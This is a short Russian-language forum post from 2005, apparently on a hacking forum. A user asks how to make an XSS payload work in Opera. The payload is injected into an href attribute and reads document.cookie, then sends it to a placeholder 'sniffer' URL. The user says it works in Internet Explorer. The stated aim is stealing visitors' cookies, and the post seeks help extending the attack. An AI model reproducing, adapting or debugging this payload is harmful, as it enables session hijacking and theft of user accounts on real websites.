Вопрос по Xss

Discussion in 'Песочница' started by Kihamo, 7 Mar 2005.

  1. Kihamo

    Kihamo New Member

    Joined:
    14 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Извеняюсь если не в тот раздел запостил, но по моему больше было некуда. Суть проблемы. Можно залить код типа
    Code:
    <a href='мои_данные'>мои данные</a>
    
    Причем мои_данные пропускают кавычки и знак апострофа, знаки > < не пропускает. Цель - заставить выполнить скрипт параметры которого будут куки.
    Я пробывал стандартно
    Code:
    'style='display:none;background:url(javascript:document.images[2].src="снифер?"+document.cookie)
    
    В ослике работает нормально, а в опере (тестил на 7) не пашет хоть убей. Как мона решить эту проблему?
     
Loading...